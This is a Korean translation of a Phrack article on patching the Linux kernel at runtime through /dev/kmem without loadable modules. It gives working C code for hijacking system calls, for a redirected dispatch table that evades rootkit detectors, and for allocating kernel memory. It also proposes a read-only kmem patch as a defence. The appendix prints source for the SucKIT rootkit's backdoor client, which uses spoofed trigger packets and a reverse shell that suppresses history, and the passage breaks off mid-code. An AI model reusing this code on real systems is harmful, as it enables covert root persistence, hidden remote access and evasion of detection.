==Phrack Inc.==
Volume 0x0b, Issue 0x3a, Phile #0x07 of 0x0e
|=----------=[ Linux on-the-fly kernel patching without LKM ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ sd <sd@sf.cz>, devik <devik@cdi.cz> ]=---------------=|
|=----------------------=[ December 12th 2001 ]=-------------------------=|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= 번역 : 이계찬 (cagers96@hanmail.net) =
= 첫작성 : 2003년 8월 19일 =
= 마지막 수정 : 2003년 8월 20일 =
= ※ * 주의: 이 문서는 갖가지 오역과 의역이 난무함을 먼저 알려드립니다. =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--[ Contents
1 - Introduction
2 - /dev/kmem is our friend
3 - Replacing kernel syscalls, sys_call_table[]
3.1 - How to get sys_call_table[] without LKM ?
3.2 - Redirecting int 0x80 call sys_call_table[eax] dispatch
4 - Allocating kernel space without help of LKM support
4.1 - Searching kmalloc() using LKM support
4.2 - pattern search of kmalloc()
4.3 - The GFP_KERNEL value
4.4 - Overwriting a syscall
5 - What you should take care of
6 - Possible solutions
7 - Conclusion
8 - References
9 - Appendix: SucKIT: The implementation
--[ 1 - Introduction
우선, 우리는 오래전에 커널 패칭기술을 발전시킨 Silvio Cesare에게
감사해야 한다. 대부분의 아이디어들은 그에게서 빌려온 것이다.
이 문서에서, 우리는 모듈의 지원이나 System.map파일의 도움없이 리눅스 커널
(특히 syscalls)을 오용하는 방법에 대하여 논의할 것이다. 그렇게 하여, 우리는
독자가 LKM이 무엇인지 LKM이 어떻게 커널내부로 로드되는가에 관한 실마리를 찾을 수
있을 것 이라고 생각한다. 더 많은 정보를 원한다면 아래 글을 읽어보라.
(paragraph 6. [1], [2], [3])
어떤 사람이 몇개의 중요한 리눅스 시스템 콜을 바꾸기를 원하고 LKM지원이 가능하지
않은 경우를 생각해 보라. 루트 권한을 가지고 있더라도 LKM Rootkit을 컴파일 하는데
필요한 라이브러리가 없다고 생각해 보라. 이러한 문제에 대한 해결책으로서 제시한 모든
기술들을 구현한 예제툴이 appendix에 있다.
묘사된 대부분의 것들(such as syscalls, memory addressing
schemes ... code too)은 단지 ia32 architecture에서만 작동할 것이다. 누군가 다른 architecture에
관하여 연구한다면 우리에게 연락하길 바란다.
--[ 2 - /dev/kmem is our friend
"Mem is a character device file that is an image of the main memory of
the computer. It may be used, for example, to examine (and even patch)
the system."
-- from the Linux 'mem' man page
Run-time kernel patching에 관한 Silvio의 글[2]을 간단히 살펴보면:
이 문서에서 우리가 커널 공간에서 작업하는 모든것은 표준 리눅스 디바이스 /dev/kmem
을 사용하여 수행 되어진다. 이 디바이스는 단지 root만 Read/write권한을 가지므로
그것(/dev/kmem)을 오용하고 싶다면 root권한을 가져야만 한다.
access하기 위하여 /dev/kmem의 허가권을 변화시키는 것만으로는 충분하지 않다.
/dev/kmem에 대한 접근이 VFS에 의해 허가되어진 후에 process의 capable(CAP_SYS_RAWIO)
을 알기위해 /usr/src/linux/drivers/char/mem.c의 검사 또한 필요하다.
우리는 또 하나의 디바이스 /dev/mem이 있다는 것을 인식해야 한다.
그것은 VM translation이전의 물리적인 메모리다. 우리가 page directory location에
대해 안다면, 그것(/dev/mem)을 사용하는 것이 가능할 것이다. 하지만, 우리는
이러한 가능성에 대해서는 연구하지 않았다.
lseek()를 통해 address를 알아내고(선택하고), read()를 통해 읽고, write()의 도움으로
쓰는 것이다. ....단순히.
커널에서의 작업에 유용한 함수들:
/* read data from kmem */
static inline int rkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (read(fd, buf, size) != size) return 0;
return size;
}
/* write data to kmem */
static inline int wkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (write(fd, buf, size) != size) return 0;
return size;
}
/* read int from kmem */
static inline int rkml(int fd, int offset, ulong *buf)
{
return rkm(fd, offset, buf, sizeof(ulong));
}
/* write int to kmem */
static inline int wkml(int fd, int offset, ulong buf)
{
return wkm(fd, offset, &buf, sizeof(ulong));
}
--[ 3 - Replacing kernel syscalls, sys_call_table[]
우리 모두가 아는것처럼, sysclls는 리눅스에서 가장 저수준의 시스템
함수들이다. 따라서, 우리는 그것들에 많은 관심을 가지게 될 것이다.
Syscall들은 하나의 큰 테이블(sct)로 그룹화 되어 있다. 그것은 단지
256개의 일차원 배열로서(on ia32 architecture) syscall넘버에 의한 배열의
인덱싱은 주어진 syscall의 진입점을 나타낸다.
An example pseudocode:
/* as everywhere, "Hello world" is good for begginers ;-) */
/* our saved original syscall */
int (*old_write) (int, char *, int);
/* new syscall handler */
new_write(int fd, char *buf, int count) {
if (fd == 1) { /* stdout ? */
old_write(fd, "Hello world!\n", 13);
return count;
} else {
return old_write(fd, buf, count);
}
}
old_write = (void *) sys_call_table[__NR_write]; /* save old */
sys_call_table[__NR_write] = (ulong) new_write; /* setup new one */
/* Err... there should be better things to do instead fucking up console
with "Hello worlds" ;) */
이것은 다양한 LKM rootkit들의 고전적인 시나리오이다. (see paragraph 7),
우리가 sys_call_table[]을 import하고 올바른 방법으로 그것을 조작하는 것이
가능할 경우에는 tty sniffers/hijackers (the halflife's one, f.e. [4])
등은 단순히 /sbin/insmod에 의해 import된다.
[ using create_module() / init_module() ]
/**************************************************************************
잡담:kernel 2.4.18부터 sys_call_table이 export되지 않는다고 한다.
따라서, 현재 커널에서는 고전적인 방법으로 syscall을 후킹할 수
없는것으로 알고있다. 정확한 사실은 아니니..이부분에 대해 아시는
분 있으면 리플..부탁드립니다.
**************************************************************************/
--[ 3.1 - How to get sys_call_table[] without LKM
우선, 커널은 LKM이 지원되지 않는 경우에 심벌들에 대한 어떠한 정보도 갖지
않는다는것을 알아라. It is rather a clever decision because why could someone need
it without LKM ? 디버깅을 위해? 당신은 대신 System.map을 가지고 있다.
우리는 그것(system.map)이 필요하다. LKM이 지원되는 경우에는 LKM으로 import되도록
의도된 심벌들이 있다.그러나, 우리는 LKM없이 할 수 있다고 했다. right ?
As far we know, the most elegant way how to obtain sys_call_table[] is:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
struct {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed)) idtr;
struct {
unsigned short off1;
unsigned short sel;
unsigned char none,flags;
unsigned short off2;
} __attribute__ ((packed)) idt;
int kmem;
void readkmem (void *m,unsigned off,int sz)
{
if (lseek(kmem,off,SEEK_SET)!=off) {
perror("kmem lseek"); exit(2);
}
if (read(kmem,m,sz)!=sz) {
perror("kmem read"); exit(2);
}
}
#define CALLOFF 100 /* we'll read first 100 bytes of int $0x80*/
main ()
{
unsigned sys_call_off;
unsigned sct;
char sc_asm[CALLOFF],*p;
/* well let's read IDTR */
asm ("sidt %0" : "=m" (idtr));
printf("idtr base at 0x%X\n",(int)idtr.base);
/* now we will open kmem */
kmem = open ("/dev/kmem",O_RDONLY);
if (kmem<0) return 1;
/* read-in IDT for 0x80 vector (syscall) */
readkmem (&idt,idtr.base+8*0x80,sizeof(idt));
sys_call_off = (idt.off2 << 16) | idt.off1;
printf("idt80: flags=%X sel=%X off=%X\n",
(unsigned)idt.flags,(unsigned)idt.sel,sys_call_off);
/* we have syscall routine address now, look for syscall table
dispatch (indirect call) */
readkmem (sc_asm,sys_call_off,CALLOFF);
p = (char*)memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);
sct = *(unsigned*)(p+3);
if (p) {
printf ("sys_call_table at 0x%x, call dispatch at 0x%x\n",
sct, p);
}
close(kmem);
}
어덯게 작동하는가? sidt instruction은 interrupt descriptor table을 위해
프로세서에게 요청한다.[asm ("sidt %0" : "=m" (idtr));], 이러한 구조로부터
우리는 int $0x80의 interrupt descriptor에 대한 포인터를 얻을 것이다.
[readkmem (&idt,idtr.base+8*0x80,sizeof(idt));].
>IDT로부터 우리는 int $0x80의 진입점의 주소를 계산 할 수 있다.
[sys_call_off = (idt.off2 << 16) | idt.off1;]
이제 우리는 int $0x80이 어디서 시작하는지 안다. 그러나 그것이 우리가 원하는
sys_call_table[]은 아니다. 자 int $0x80 진입점을 보도록 하자.
[sd@pikatchu linux]$ gdb -q /gdb -q /boot/vmlinux-2.4.20-8
(no debugging symbols found)...(gdb) disass system_call
Dump of assembler code for function system_call:
0xc0106bc8 <system_call>: push %eax
0xc0106bc9 <system_call+1>: cld
0xc0106bca <system_call+2>: push %es
0xc0106bcb <system_call+3>: push %ds
0xc0106bcc <system_call+4>: push %eax
0xc0106bcd <system_call+5>: push %ebp
0xc0106bce <system_call+6>: push %edi
0xc0106bcf <system_call+7>: push %esi
0xc0106bd0 <system_call+8>: push %edx
0xc0106bd1 <system_call+9>: push %ecx
0xc0106bd2 <system_call+10>: push %ebx
0xc0106bd3 <system_call+11>: mov $0x18,%edx
0xc0106bd8 <system_call+16>: mov %edx,%ds
0xc0106bda <system_call+18>: mov %edx,%es
0xc0106bdc <system_call+20>: mov $0xffffe000,%ebx
0xc0106be1 <system_call+25>: and %esp,%ebx
0xc0106be3 <system_call+27>: cmp $0x100,%eax
0xc0106be8 <system_call+32>: jae 0xc0106c75 <badsys>
0xc0106bee <system_call+38>: testb $0x2,0x18(%ebx)
0xc0106bf2 <system_call+42>: jne 0xc0106c48 <tracesys>
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4) <-- that's it
0xc0106bfb <system_call+51>: mov %eax,0x18(%esp,1)
0xc0106bff <system_call+55>: nop
End of assembler dump.
(gdb) print &sys_call_table
$1 = (<data variable, no debug info> *) 0xc01e0f18 <-- see ? it's same
(gdb) x/xw (system_call+44)
0xc0106bf4 <system_call+44>: 0x188514ff <-- opcode (little endian)
(gdb)
간단히, int $80 진입점의 시작 근처에 'call sys_call_table(,eax,4)' opcode가
있다. 왜냐하면, 이러한 간접 호출은 커널 버전(2.0.10에서 2.4.10까지 같다)마다
다르지 않기 때문이다. 단지 'call <something>(,eax,4)'의 패턴을 찾는것이 상대적으로
안전하다.
opcode = 0xff 0x14 0x85 0x<address_of_table>
[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]
Being paranoid, one could do a more robust hack. IDT에서의 모든 int $0x80
handler를 우리가 만든 handler를 향하도록 재지정하고, 흥미있는 함수
(시스템 콜 함수)들을 가로채라. 그것은 우리가 재진입을 다루어야 하는
것만큼 훨씬더 복잡하다.
이제 우리는 sys_call_table[]이 어디에 위치해 있는지 알고, 일부 sycall들의
주소를 변경시킬 수 있다 :
Pseudocode:
readkmem(&old_write, sct + __NR_write * 4, 4); /* save old */
writekmem(new_write, sct + __NR_write * 4, 4); /* set new */
--[ 3.2 - Redirecting int $0x80 call sys_call_table[eax] dispatch
이 글을 쓸 때, 우리는 packetstorm/freshmeat에서 여러 rootkit탐지툴을
발견하였다. 그것들은 LKM/syscalltable/다른 커널 부분에서 무엇인가
잘못되었다는 사실을 탐지할 수 있을것이다. 다행히도, 대부분 너무 어리석어서
spaceWalker에 의해 [6]에서 소개된 트릭으로 간단하게 속일수 있다.
Pseudocode:
ulong sct = addr of sys_call_table[]
char *p = ptr to int 0x80's call sct(,eax,4) - dispatch
ulong nsct[256] = new syscall table with modified entries
readkmem(nsct, sct, 1024); /* read old */
old_write = nsct[__NR_write];
nsct[__NR_write] = new_write;
/* replace dispatch to our new sct */
writekmem((ulong) p+3, nsct, 4);
/* Note that this code never can work, because you can't
redirect something kernel related to userspace, such as
sct[] in this case */
Background:
우리는 기존 sys-call_table[]의 복사본을 생성한다.[readkmem(nsct, sct,
1024);], 그리고 나서, 우리가 바꾸고자 하는 엔트리들을 변경할 것이다.
[old_write=nsct[__NR_write]; nsct[__NR_write] = new_write;] 그리고,
call <something>(,eax,4)에서 <something>의 _only_addr을 바꾼다. :
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4)
~~~~|~~~~~
|__ Here will be address of
_our_ sct[]
int $0x80의 일관성을 검사하지 않는 LKM 탐지 툴들은 어떤것도 탐지할 수 없을
것이다. sys_call_table[]은 같지만, int $0x80은 우리가 끼워넣은 테이블을 사용한다.
--[ 4 - Allocating kernel space without help of LKM support
다음에 우리가 필요한 것은 주소값 0xc0000000(or 0x80000000)위의 memory page이다.
0xc0000000 값은 사용자와 커널메모리의 구분점이다. 사용자 프로세스들은 그 한계점
윗부분에 접근하지 못한다. 이 구분점이 정확하지 않고 다를 수 있다는 것을 고려해라.
그래서 실행중에 int $0x80진입점으로부터 그 구분점을 알아내는 것이 좋은 생각이다.
구분점 위의 page을 얻는 방법은? LKM이 지원되는 일반적인 kernel이 그것(구분점위의 page
)를 어떻게 얻는지 살펴보자. (/usr/src/linux/kernel/module.c):
...
void inter_module_register(const char *im_name, struct module *owner,
const void *userdata)
{
struct list_head *tmp;
struct inter_module_entry *ime, *ime_new;
if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
/* Overloaded kernel, not fatal */
...
우리가 기대했던것처럼, kmalloc(size, GFP_KERNEL)을 사용했다. 그러나, 아직 kmalloc()을
사용할 수 없다. 왜냐하면:
- 우리는 kmalloc()의 주소를 알지 못한다. [ paragraph 4.1, 4.2 ]
- 우리는 GFP_KERNEL의 값을 알지 못한다. [ paragraph 4.3 ]
- 우리는 사용자공간에서 kmalloc()를 호출할 수 없다.[ paragraph 4.4 ]
--[ 4.1 - Searching for kmalloc() using LKM support
LKM 지원을 받을 수 있다면:
/* kmalloc() lookup */
/* 가장 단순하고, 안전한 방법, 그러나 LKM support가 필요 */
ulong get_sym(char *n) {
struct kernel_sym tab[MAX_SYMS];
int numsyms;
int i;
numsyms = get_kernel_syms(NULL);
if (numsyms > MAX_SYMS || numsyms < 0) return 0;
get_kernel_syms(tab);
for (i = 0; i < numsyms; i++) {
if (!strncmp(n, tab[i].name, strlen(n)))
return tab[i].value;
}
return 0;
}
ulong get_kma(ulong pgoff)
{
ret = get_sym("kmalloc");
if (ret) return ret;
return 0;
}
We leave this without comments.
--[ 4.2 - pattern search of kmalloc()
그러나 LKM이 지원되지 않는다면, 문제가 있다. 해결방법이 좀 지저분하고,
그리 좋지는 ㅇ낳지만, 작동은 할 것이다.
우리는 커널의 .text섹션을 검사할 것이고, 다음과 같은 패턴을 찾을것이다.:
push GFP_KERNEL <something between 0-0xffff>
push size <something between 0-0x1ffff>
call kmalloc
모든 정보가 테이블에 모일것이고, 가장 빈번하게 불려진 함수는 kmalloc()일
것이다. 여기 코드가 있다. :
/* kmalloc() lookup */
#define RNUM 1024
ulong get_kma(ulong pgoff)
{
struct { uint a,f,cnt; } rtab[RNUM], *t;
uint i, a, j, push1, push2;
uint found = 0, total = 0;
uchar buf[0x10010], *p;
int kmem;
ulong ret;
/* uhh, before we try to brute something, attempt to do things
in the *right* way ;)) */
ret = get_sym("kmalloc");
if (ret) return ret;
/* humm, no way ;)) */
kmem = open(KMEM_FILE, O_RDONLY, 0);
if (kmem < 0) return 0;
for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
i += 0x10000) {
if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
/* loop over memory block looking for push and calls */
for (p = buf; p < buf + 0x10000;) {
switch (*p++) {
case 0x68:
push1 = push2;
push2 = *(unsigned*)p;
p += 4;
continue;
case 0x6a:
push1 = push2;
push2 = *p++;
continue;
case 0xe8:
if (push1 && push2 &&
push1 <= 0xffff &&
push2 <= 0x1ffff) break;
default:
push1 = push2 = 0;
continue;
}
/* we have push1/push2/call seq; get address */
a = *(unsigned *) p + i + (p - buf) + 4;
p += 4;
total++;
/* find in table */
for (j = 0, t = rtab; j < found; j++, t++)
if (t->a == a && t->f == push1) break;
if (j < found)
t->cnt++;
else
if (found >= RNUM) {
return 0;
}
else {
found++;
t->a = a;
t->f = push1;
t->cnt = 1;
}
push1 = push2 = 0;
} /* for (p = buf; ... */
} /* for (i = (pgoff + 0x100000) ...*/
close(kmem);
t = NULL;
for (j = 0;j < found; j++) /* find a winner */
if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
if (t) return t->a;
return 0;
}
위의 코드는 단순 상태 머신이다. 그리고 그것은 가능한 다른 asm code layout과
혼동되지 않을것이다.(몇가지 gcc옵션들을 사용하였을때) 그것은 다른 코드패턴들을
이해하는데 확장되어질 수 있고(switch구문을 보라), 알려진 패턴들에 대해
PUSHes에서의 GFP값을 검사하여 좀 더 정확성을 높일 수 있을 것이다.
(see paragraph bellow).
이 코드의 정확성은 80%이다. (i.e. 80% points to kmalloc, 20% to
some junk) 그리고 커널 버젼 2.2.1 에서 2.4.13까지 작동 할 것이다.
--[ 4.3 The GFP_KERNEL value
kmalloc()를 사용하면서 얻은 또다른 문제는 GFP_KERNEL값이 커널 시리즈에서 다양하게
나타난다는 사실이다. 그러나, uname()의 도움으로 그 문제를 해결할 수 있다.
+-----------------------------------+
| kernel version | GFP_KERNEL value |
+----------------+------------------+
| 1.0.x .. 2.4.5 | 0x3 |
+----------------+------------------+
| 2.4.6 .. 2.4.x | 0x1f0 |
+----------------+------------------+
2.4.7-2.4.9 kernels에서는 문제가 있다. 가끔 GFP_KERNEL의 잘못된 값으로 인해 실패한다.
위 테이블의 값은 정확하지 않다. 그것은 단지 우리가 사용할 수 있는 값들을 보여주는 것이다.
The code:
#define NEW_GFP 0x1f0
#define OLD_GFP 0x3
/* uname struc */
struct un {
char sysname[65];
char nodename[65];
char release[65];
char version[65];
char machine[65];
char domainname[65];
};
int get_gfp()
{
struct un s;
uname(&s);
if ((s.release[0] == '2') && (s.release[2] == '4') &&
(s.release[4] >= '6' ||
(s.release[5] >= '0' && s.release[5] <= '9'))) {
return NEW_GFP;
}
return OLD_GFP;
}
--[ 4.3 - Overwriting a syscall
위에서 언급했던 것처럼 우리는 kmalloc()를 사용자 공간으로부터 직접적으로
호출할 수 없다. 해결방법은 syscall을 대체하는 silvio의 속임수[2]이다. :
1. 어느 sycall의 주소를 알아내라.
(IDT -> int 0x80 -> sys_call_table)
2. kmalloc()를 호출하고 할당된 페이지에 대한 포인터를 리턴하는 루틴을
만들어라.
3. 어느 syscall의 우리의 루틴에 대한 바이트 크기를 저장하라.
4. 우리의 루틴으로 어느 syscall의 코드를 덮어써라.
5. int $0x80을 통해 사용자 공간에서 이 syscall을 호출하라. 우리의 루틴은
커널 문맥에서 작동할 것이다. 그리고 우리는 리턴값으로서 할당된 메모리의
주소값을 넘겨주는 kmalloc()를 호출할 수있다.
6. 저장된 바이트들로 어느 syscall의 코드를 복구하라.(in step 3.)
our_routine may look as something like that:
struct kma_struc {
ulong (*kmalloc) (uint, int);
int size;
int flags;
ulong mem;
} __attribute__ ((packed));
int our_routine(struct kma_struc *k)
{
k->mem = k->kmalloc(k->size, k->flags);
return 0;
}
이러한 경우 우리가 만든 루틴에 필요한 정보를 직접적으로 넘겨준다.
이제 우리는 커널 메모리는 가지고 있다. 따라서 우리의 핸들링 루틴들을 거기에 복사할 수 있다.
위조된 sys_call_table에서 우리의 핸들링루틴들에 대한 엔트리들을 가리킨다. int 0x80으로 이러한
위조된 테이블에 침투한다.
--[ 5 - What you should take care of
이러한 기술을 사용하여무언가 쓸 때는 다음과 같은 규칙들을 따르는 것이 좋다:
- 커널 버젼을 고려해라.(이것은 GFP_KERNEL을 의미하다.).
- 커널 시리즈 간에 쉽게 호환할 수 있기를 바란다면 task_struct을 포함하여
어느 내부 커널 구조들도 사용하지 말고 단지 syscall들만을 이용하라.
- SMP는 여러 문제들을 야기할 수 있다. 재진입과 그것이 어디에 필요한지에 대해
고려하는것에 대해 기억하고 사용자 공간 lock[ src/core.c#ualloc() ]들을 사용하라.
--[ 6 - Possible solutions
좋다. 이제 보안의 측면에서 당신은 아마도 그러한 귀찮은 툴들을 사용하는 스크립트 키디들의
공격을 물리치기 원할것이다. 그러면 당신은 다음의 kmem 읽기전용 패치를 적용시켜야 하고
당신의 커널에서 LKM 지원기능을 사용할 수 없게 해야 한다.
<++> kmem-ro.diff
--- /usr/src/linux/drivers/char/mem.c Mon Apr 9 13:19:05 2001
+++ /usr/src/linux/drivers/char/mem.c Sun Nov 4 15:50:27 2001
@@ -49,6 +51,8 @@
const char * buf, size_t count, loff_t *ppos)
{
ssize_t written;
+ /* disable kmem write */
+ return -EPERM;
written = 0;
#if defined(__sparc__) || defined(__mc68000__)
<-->
이 패치는 /dev/kmem의 쓰기 능력에 의존하는 기존의 일부 유틸리티들의 연동에 문제를
일으킬 수 있다. 그것은 보안에 대한 대가이다.
--[ 7 - Conclusion
리눅스에서 raw memory I/O 디바이스들은 꽤 강력한 듯 싶다.
루트 권한을 가진 공격자들은 오랫동안 들키지 않고 그들의 행동을 숨기기 위해,
정보들을 훔치기 위해 원격 접속등을 위해 그것들을 사용할 수 있다. 지금까지 알아본 바로는
이러한 디바이스들은 빈번히 사용되지 않는다. (in the meaning of write access), 따라서,
writing 능력을 제한하는 것은 좋은 생각이다.
--[ 8 - References
[1] Silvio Cesare's homepage, pretty good info about low-level linux stuff
[http://www.big.net.au/~silvio]
[2] Silvio's article describing run-time kernel patching (System.map)
[http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt]
[3] QuantumG's homepage, mostly virus related stuff
[http://biodome.org/~qg]
[4] "Abuse of the Linux Kernel for Fun and Profit" by halflife
[Phrack issue 50, article 05]
[5] "(nearly) Complete Linux Loadable Kernel Modules. The definitive guide
for hackers, virus coders and system administrators."
[http://www.thehackerschoice.com/papers]
At the end, I (sd) would like to thank to devik for helping me a lot with
this crap, to Reaction for common spelling checks and to anonymous
editor's friend which proved the quality of article a lot.
--[ 9 - Appendix - SucKIT: The implementation
I'm sure that you are smart enough, so you know how to extract, install and
use these files.
[MORONS HINT: Try Phrack extraction utility, ./doc/README]
ATTENTION: This is a full-working rootkit as an example of the technique
described above, the author doesn't take ANY RESPONSIBILITY for
any damage caused by (mis)use of this software.
<++> ./client/Makefile
client: client.c
$(CC) $(CFLAGS) -I../include client.c -o client
clean:
rm -f client core
<--> ./client/Makefile
<++> ./client/client.c
/* $Id: client.c, TTY client for our backdoor, see src/bd.c */
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <net/if.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <termios.h>
#include <errno.h>
#include <string.h>
#define DEST_PORT 80
/* retry timeout, 15 secs works fine,
try lower values on slower networks */
#define RETRY 15
#include "ip.h"
int winsize;
char *envtab[] =
{
"",
"",
"LOGNAME=shitdown",
"USERNAME=shitdown",
"USER=shitdown",
"PS1=[rewt@\\h \\W]\\$ ",
"HISTFILE=/dev/null",
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:"
"/usr/local/sbin:/usr/X11R6/bin:./bin",
"!TERM",
NULL
};
int sendenv(int sock)
{
struct winsize ws;
#define ENVLEN 256
char envbuf[ENVLEN+1];
char buf1[256];
char buf2[256];
int i = 0;
ioctl(0, TIOCGWINSZ, &ws);
sprintf(buf1, "COLUMNS=%d", ws.ws_col);
sprintf(buf2, "LINES=%d", ws.ws_row);
envtab[0] = buf1; envtab[1] = buf2;
while (envtab[i]) {
bzero(envbuf, ENVLEN);
if (envtab[i][0] == '!') {
char *env;
env = getenv(&envtab[i][1]);
if (!env) goto oops;
sprintf(envbuf, "%s=%s", &envtab[i][1], env);
} else {
strncpy(envbuf, envtab[i], ENVLEN);
}
if (write(sock, envbuf, ENVLEN) < ENVLEN) return 0;
oops:
i++;
}
return write(sock, "\n", 1);
}
void winch(int i)
{
signal(SIGWINCH, winch);
winsize++;
}
void sig_child(int i)
{
waitpid(-1, NULL, WNOHANG);
}
int usage(char *s)
{
printf(
"Usage:\n"
"\t%s <host> [source_addr] [source_port]\n\n"
,s);
return 1;
}
ulong resolve(char *s)
{
struct hostent *he;
struct sockaddr_in si;
/* resolve host */
bzero((char *) &si, sizeof(si));
si.sin_addr.s_addr = inet_addr(s);
if (si.sin_addr.s_addr == INADDR_NONE) {
printf("Looking up %s...", s); fflush(stdout);
he = gethostbyname(s);
if (!he) {
printf("Failed!\n");
return INADDR_NONE;
}
memcpy((char *) &si.sin_addr, (char *) he->h_addr,
sizeof(si.sin_addr));
printf("OK\n");
}
return si.sin_addr.s_addr;
}
int raw_send(struct rawdata *d, ulong tfrom, ushort sport, ulong to,
ushort dport)
{
int raw_sock;
int hincl = 1;
struct sockaddr_in from;
struct ippkt packet;
struct pseudohdr psd;
int err;
char tosum[sizeof(psd) + sizeof(packet.tcp)];
raw_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (raw_sock < 0) {
perror("socket");
return 0;
}
if (setsockopt(raw_sock, IPPROTO_IP,
IP_HDRINCL, &hincl, sizeof(hincl)) < 0) {
perror("socket");
close(raw_sock);
return 0;
}
bzero((char *) &packet, sizeof(packet));
from.sin_addr.s_addr = to;
from.sin_family = AF_INET;
/* setup IP header */
packet.ip.ip_len = sizeof(struct ip) +
sizeof(struct tcphdr) + 12 +
sizeof(struct rawdata);
packet.ip.ip_hl = sizeof(packet.ip) >> 2;
packet.ip.ip_v = 4;
packet.ip.ip_ttl = 255;
packet.ip.ip_tos = 0;
packet.ip.ip_off = 0;
packet.ip.ip_id = htons((int) rand());
packet.ip.ip_p = 6;
packet.ip.ip_src.s_addr = tfrom; /* www.microsoft.com :) */
packet.ip.ip_dst.s_addr = to;
packet.ip.ip_sum = in_chksum((u_short *) &packet.ip,
sizeof(struct ip));
/* tcp header */
packet.tcp.source = sport;
packet.tcp.dest = dport;
packet.tcp.seq = 666;
packet.tcp.ack = 0;
packet.tcp.urg = 0;
packet.tcp.window = 1234;
packet.tcp.urg_ptr = 1234;
memcpy(packet.data, (char *) d, sizeof(struct rawdata));
/* pseudoheader */
memcpy(&psd.saddr, &packet.ip.ip_src.s_addr, 4);
memcpy(&psd.daddr, &packet.ip.ip_dst.s_addr, 4);
psd.protocol = 6;
psd.lenght = htons(sizeof(struct tcphdr) + 12 +
sizeof(struct rawdata));
memcpy(tosum, &psd, sizeof(psd));
memcpy(tosum + sizeof(psd), &packet.tcp, sizeof(packet.tcp));
packet.tcp.check = in_chksum((u_short *) &tosum, sizeof(tosum));
/* send that fuckin' stuff */
err = sendto(raw_sock, &packet, sizeof(struct ip) +
sizeof(struct iphdr) + 12 +
sizeof(struct rawdata),
0, (struct sockaddr *) &from,
sizeof(struct sockaddr));
if (err < 0) {
perror("sendto");
close(raw_sock);
return 0;
}
close(raw_sock);
return 1;
}
#define BUF 16384
int main(int argc, char *argv[])
{
ulong serv;
ulong saddr;
ushort sport = htons(80);
char hostname[1024];
struct rawdata data;
int sock;
int pid;
struct sockaddr_in peer;
struct sockaddr_in srv;
int slen = sizeof(srv);
int ss;
char pwd[256];
int i;
struct termios old, new;
unsigned char buf[BUF];
fd_set fds;
struct winsize ws;
/* input checks */
if (argc < 2) return usage(argv[0]);
serv = resolve(argv[1]);
if (!serv) return 1;
if (argc >= 3) {
saddr = resolve(argv[2]);
if (!saddr) return 1;
} else {
if (gethostname(hostname, sizeof(hostname)) < 0) {
perror("gethostname");
return 1;
}
saddr = resolve(hostname);
if (!saddr) return 1;
}
if (argc == 4) {
int i;
if (sscanf(argv[3], "%u", &i) != 1)
return usage(argv[0]);
sport = htons(i);
}
peer.sin_addr.s_addr = serv;
printf("Trying %s...", inet_ntoa(peer.sin_addr)); fflush(stdout);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("socket");
return 1;
}
bzero((char *) &peer, sizeof(peer));
peer.sin_family = AF_INET;
peer.sin_addr.s_addr = htonl(INADDR_ANY);
peer.sin_port = 0;
if (bind(sock, (struct sockaddr *) &peer, sizeof(peer)) < 0) {
perror("bind");
return 1;
}
if (listen(sock, 1) < 0) {
perror("listen");
return 1;
}
pid = fork();
if (pid < 0) {
perror("fork");
return 1;
}
/* child ? */
if (pid == 0) {
int plen = sizeof(peer);
if (getsockname(sock, (struct sockaddr *) &peer,
&plen) < 0) {
exit(0);
}
data.ip = saddr;
data.port = peer.sin_port;
data.id = RAWID;
while (1) {
int i;
if (!raw_send(&data, saddr, sport, serv,
htons(DEST_PORT))) {
exit(0);
}
for (i = 0; i < RETRY; i++) {
printf("."); fflush(stdout);
sleep(1);
}
}
}
signal(SIGCHLD, sig_child);
ss = accept(sock, (struct sockaddr *) &srv, &slen);
if (ss < 0) {
perror("Network error");
kill(pid, SIGKILL);
exit(1);
}
kill(pid, SIGKILL);
close(sock);
printf("\nChallenging %s\n", argv[1]);
/* set-up terminal */
tcgetattr(0, &old);
new = old;
new.c_lflag &= ~(ICANON | ECHO | ISIG);
new.c_iflag &= ~(IXON | IXOFF);
tcsetattr(0, TCSAFLUSH, &new);
printf(
"Connected to %s.\n"
"Escape character is '^K'\n", argv[1]);
printf("Password:"); fflush(stdout);
bzero(pwd, sizeof(pwd));
i = 0;
while (1) {
if (read(0, &pwd[i], 1) <= 0) break;
if (pwd[i] == ECHAR) {
printf("Interrupted!\n");
tcsetattr(0, TCSAFLUSH, &old);
return 0;
}
if (pwd[i] == '\n') break;
i++;
}
pwd[i] = 0;
write(ss, pwd, sizeof(pwd));
printf("\n");
if (sendenv(ss) <= 0) {
perror("Failed");
tcsetattr(0, TCSAFLUSH, &old);
return 1;
}
/* everything seems to be OK, so let's go ;) */
winch(0);
while (1) {
